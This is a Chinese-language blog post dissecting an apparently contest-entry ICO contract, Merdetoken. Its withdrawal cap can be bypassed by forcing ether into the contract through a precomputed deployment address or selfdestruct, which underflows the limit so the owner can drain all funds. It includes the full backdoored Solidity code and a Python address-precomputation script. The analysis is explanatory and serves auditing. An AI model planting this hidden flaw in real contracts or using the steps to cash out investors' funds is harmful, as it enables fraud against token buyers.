序
Ethereum从2013年一直走到现在,已经过去了五年。在2017年,出尽了风头,然而却因为智能合约的问题就搞出了好几个大事情,其背后透漏出的就是开发者对Ethereum或者说EVM的不了解。普通大众就更不明白了。2017年,尤其ICO项目层出不穷,然而合约代码有多少是严格审计的?今天,我们来仔细审视一段代码,看看有些项目方是如何操控ICO进程的。
老规矩,先上ICO代码
这段ICO代码,有个提取限制,即owner在ICO完后的第一个week里可以最多取1个ETH,第二个week里可以最多取2个ETH,第三个week里可以最多取4TH,第四个week里可以最多取8TH,以此类推。
代码来源于这里
/**
* Merdetoken
*
* See: https://theethereum.wiki/w/index.php/ERC20_Token_Standard
*
* This ICO allows participants to send ether to this contract in exchange
* for MDT tokens during the presale period (4 weeks).
*
* Once the presale period is over, no addition tokens may be created and the owner is
* able to withdraw the funds in according to a schedule which increases over time:
* - week 1: 1 ether
* - week 2: 2 ether
* - week 3: 4 ether
* - week 4: 8 ether
* ...and so on. This way as the project grows and further funds are required, more can
* be withdrawn, however, by deferring the funding, the owner cannot just cash out and
* skip town.
*
* An entry for a sinister contract...
*
* Content Info:
* http://u.solidity.cc/?t=1&cn=ZmxleGlibGVfcmVjc18y&iid=41e0d6e3f8114ddc86b2bd023e624f01&uid=869384457991671808&nid=244+272699400
*
*
* Licensed under both:
* - MIT License
* - Creative Commons Attribution-ShareAlike 3.0 Unported (CC BY-SA 3.0)
*
* Author information will be added once the contest has ended.
*/
// Not part of the exploit... Just shutting up compiler warnings...
pragma solidity ^0.4.10;
contract Merdetoken {
// ERC-20 constants
string public constant name = "Merdetoken";
string public constant symbol = "MDT";
uint8 public constant decimals = 18;
// The ICO owner
address owner;
// The token balance for each member
mapping (address => uint256) balances;
// Allowances for each member
mapping(address => mapping (address => uint256)) allowed;
// The total supply of these tokens
uint256 _totalSupply;
// The date that the presale ends and the token can be traded
uint256 activationDate;
// The last time the owner issued withdraw(uint256)
uint256 lastWithdrawDate;
/**
* constructor(uint256)
*
* Create a new instance of the Merdetoken, with a given presale
* duration.
*/
function Merdetoken(uint256 duration) payable {
// Set the ICO owner
owner = msg.sender;
// The owner can buy their own tokens with an endowment (if desired)
balances[msg.sender] = msg.value;
_totalSupply = msg.value;
// Set the ICO presale end date
activationDate = now + duration;
}
/**
* withdraw(uint256)
*
* After the presale, the ICO owner may withdraw Ether from the contract
* on a deferred schedule; once per week, the amount doubling each week.withdraw
*/
function withdraw(uint256 amount) {
// Cannot withdraw during the presale
if (now < activationDate) { throw; }
// Only the owner may withdraw funds
if (msg.sender != owner) { throw; }
// Only allow sane values to be sent
if (amount == 0 || amount > this.balance) { throw; }
// Can only withdraw once per week
if (now < lastWithdrawDate + (1 weeks)) { throw; }
lastWithdrawDate = now;
// Deferred withdraw schedule; may only withdraw 1 more ether than has ever
// been withdrawn. See top decription for schedule.
uint256 maxAmount = (_totalSupply - this.balance + (1 ether));
// Cannot withdraw more than the maximum allowed by schedule
if (amount > maxAmount) { throw; }
// Send the funds
if (!owner.send(amount)) { throw; }
}
/**
* fallback function
*
* Exchange Ether for MDT tokens. This may not be called once the presale has ended.
*/
function () payable {
// Can only buy tokens during the presale
if (now >= activationDate) { throw; }
// Give out the tokens
balances[msg.sender] += msg.value;
_totalSupply += msg.value;
}
/**
* ERC-20 token; nothing sinister below here (if there is, it wasn't intended)
* Mostly just copy and pasted from the de facto existing implmentation; changes marked
*/
function totalSupply() constant returns (uint totalSupply) {
return _totalSupply;
}
function balanceOf(address _owner) constant returns (uint256 balance) {
return balances[_owner];
}
function transfer(address _to, uint256 _amount) returns (bool success) {
// Cannot transfer tokens during the presale
if (now < activationDate) { return false; }
if (balances[msg.sender] < _amount || _amount == 0) { return false; }
balances[msg.sender] -= _amount;
balances[_to] += _amount;
return true;
}
function transferFrom(address _from, address _to, uint256 _amount) returns (bool success) {
// Cannot transfer tokens during the presale
if (now < activationDate) { return false; }
if (allowed[_from][msg.sender] < _amount || balances[_from] < _amount || _amount == 0) {
return false;
}
balances[_from] -= _amount;
allowed[_from][msg.sender] -= _amount;
balances[_to] += _amount;
return true;
}
function approve(address _spender, uint256 _amount) returns (bool success) {
allowed[msg.sender][_spender] = _amount;
return true;
}
}
作弊方法
虽然明摆着有个提取限制,但是有没有可能突破这个限制,项目方直接提款跑路呢?有!
请大家看withdraw函数,最多能够提取的金额maxAmount是由_totalSupply和this.balance决定的。而这两者看似都是同时变化的(fallback函数和构造函数),即_totalSuppy>= this.balance不变式总是成立,然而事实不总是如此,有多种方法可以打破这个不变式。
方法1
通过提前计算contract的部署地址,往这个地址打一笔钱(prefund),使得this.balance>_totalSupply成立,那么计算maxAmount就会下溢出,项目方可以直接跳过限制,直接全部提款跑路。
提前计算contract的部署地址
根据黄皮书的section 8: message call中所示,一个contract的地址取决于sender和sender' nonce(sender发送的tx数目).
The address of the new account is dened as being the rightmost 160 bits of the Keccak hash of the RLP encoding of the structure containing only the sender and the nonce. Thus we dene the resultant address for the new account a:
下面是python代码:
# -*- coding: utf-8 -*-
from ethereum.utils import *
import sys
sender = sys.argv[1] #"0x003be5df5fef651ef0c59cd175c73ca1415f53ea";
nonce = encode_int(int(sys.argv[2]))
contract_address = mk_contract_address(sender, nonce)
print("sender: {}, nonce: {}, decode_addr: {}".format(sender, nonce,"0x" + decode_addr(contract_address)))
给一个不存在的ethereum地址转账会发什么?
还是根据黄皮书来找到答案。
Throughout the present work, it is assumed that if {$$\delta$$}1[r] was originally undefined, it will be created as an account with no code or state and zero balance and nonce.
(简书markdown不支持数学符号,将就着看吧)简单来说,如果接收方的recipient不存在,就创建一个。
测试
我先计算好要部署的contract的地址,通过MetaMask向其打一笔钱,然后在etherscan中可以发现,出现一笔交易,此时没有code选项卡。再通过remix部署合约,在etherscan中可以发现多了一个contract creation交易,此时code选项卡出现了。
方法2
其实上述方法还有不好的地方,就是可以让人看到在合约创建之前就有一笔交易。其实还要一个更隐蔽的方法,selfdestruct(address), 这个函数可以向某个地址打一笔钱,而且没有任何痕迹。
结论
事实证明,类似上述代码的ICO都有操控的嫌疑。比如说, 通过计算好预期的市场价格,通过suicide向ICO地址打一笔钱,使得totalSupply不变,而筹得金额却增加,(提前)结束整个募集过程后,使得单个token的市场价格提高,达到预期的结果(疯狂割韭菜)。
最后要打赏的客官这边: 0x003be5df5fef651ef0c59cd175c73ca1415f53ea
